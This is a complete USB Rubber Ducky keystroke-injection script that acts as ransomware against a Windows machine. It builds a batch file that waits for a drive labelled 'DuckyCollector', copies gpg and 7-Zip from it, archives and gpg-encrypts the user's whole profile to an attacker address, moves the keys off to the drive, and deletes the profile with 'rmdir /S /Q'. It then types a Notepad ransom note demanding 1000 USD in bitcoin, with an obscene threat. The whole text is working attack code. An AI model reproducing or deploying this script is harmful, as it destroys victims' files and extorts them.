REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
REM Hide Window
DEFAULTDELAY 200
DELAY 3000
REM this delay ensures that I have enough time to hook up the usb to the virtual box
GUI r
DELAY 2000
STRING cmd
DELAY 500
ENTER
DELAY 750
REM ALT SPACE
REM STRING M
REM DOWNARROW
REM REPEAT 100
REM ENTER
STRING mkdir C:\temp
DELAY 100
ENTER
REM script starts here
STRING erase /Q c:\temp\DuckyWait.bat
ENTER
STRING copy con c:\temp\DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( 
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DuckyCollector" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING copy %DuckyDrive%\7za.exe c:\temp\
ENTER
STRING copy %DuckyDrive%\gpg.exe c:\temp\
ENTER
STRING copy %DuckyDrive%\payback c:\temp\
ENTER
STRING c:\temp\gpg.exe --gen-key --batch c:\temp\payback
ENTER
STRING c:\temp\gpg.exe --import c:\temp\foo.pub
ENTER
STRING c:\temp\7za.exe a "c:\temp\breakstuff.zip" "%userprofile%"
ENTER
STRING c:\temp\gpg --trust-model always --yes -ea -r youfuckednow@loser.com -r youfuckednow@loser.com C:\temp\breakstuff.zip
ENTER
STRING move c:\temp\foo.pub %DuckyDrive%\
ENTER
STRING move c:\temp\foo.sec %DuckyDrive%\
ENTER
STRING rmdir /S /Q "%userprofile%"
ENTER
STRING c:\temp\gpg.exe --delete-secret-keys King Kunta
ENTER
STRING c:\gpg.exe --delete-key foo.pub
ENTER
CONTROL z
ENTER
STRING c:\temp\DuckyWait.bat
ENTER
DELAY 10000
STRING del c:\temp\DuckyWait.bat
ENTER
DELAY 700
STRING del c:\temp\7za.exe
ENTER
DELAY 700
STRING del c:\temp\gpg.exe
ENTER
DELAY 700
STRING del c:\temp\payback
ENTER
DELAY 700
STRING del c:\temp\breakstuff.zip
ENTER
DELAY 700
STRING notepad.exe
ENTER
DELAY 700
STRING      __,_,_,___)          _______
ENTER
STRING    (--| | |             (--/    ),_)        ,_)
ENTER 
STRING       | | |  _ ,_,_        |     |_ ,_ ' , _|_,_,_, _  ,
ENTER
STRING     __| | | (/_| | (_|     |     | ||  |/_)_| | | |(_|/_)___,
ENTER
STRING    (      |___,   ,__|     \____)  |__,           |__,
ENTER
STRING                            |                         _...._
ENTER
STRING                         \  _  /                    .::o:::::.
ENTER
STRING                          (\o/)                    .:::'''':o:.
ENTER
STRING                      ---  / \  ---                :o:_    _:::
ENTER
STRING                           >*<                     `:}_>()<_{:'
ENTER
STRING                          >0<@<                 @    `'//\\'`    @ 
ENTER
STRING                         >>>@<<*              @ #     //  \\     # @
ENTER
STRING                        >@>*<0<<<           __#_#____/'____'\____#_#__
ENTER
STRING                       >*>>@<<<@<<         [__________________________]
ENTER
STRING                      >@>>0<<<*<<@<         |=_- .-/\ /\ /\ /\--. =_-|
ENTER
STRING                     >*>>0<<@<<<@<<<        |-_= | \ \\ \\ \\ \ |-_=-|
ENTER
STRING                    >@>>*<<@<>*<<0<*<       |_=-=| / // // // / |_=-_|
ENTER
STRING      \*/          >0>>*<<@<>0><<*<@<<      |=_- |`-'`-'`-'`-'  |=_=-|
ENTER
STRING  ___\\U//___     >*>>@><0<<*>>@><*<0<<     | =_-| o          o |_==_| 
ENTER
STRING  |\\ | | \\|    >@>>0<*<<0>>@<<0<<<*<@<    |=_- | !     (    ! |=-_=|
ENTER
STRING  | \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*<  _|-,-=| !    ).    ! |-_-=|_
ENTER
STRING  |\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<@</=-((=_| ! __(:')__ ! |=_==_-\
ENTER
STRING  |\\_|_|&&_// ||*.*.*.*|_\\db//__     (\_/)-=))-|/^\=^=^^=^=/^\| _=-_-_\
ENTER
STRING  """"|'.'.'.|~~|.*.*.*|     ____|_   =('.')=//   ,------------. 
ENTER     
STRING  jgs |'.'.'.|   ^^^^^^|____|>>>>>>|  ( ~~~ )/   (((((((()))))))) 
ENTER  
STRING      ~~~~~~~~         '""""`------'  `w---w`     `------------'
ENTER
STRING I encrypted EVERYTHING!! Pay me 1000 USD in bitcoin and I'll give your files back and not fuck your mom
ENTER
STRING Best, Your Dad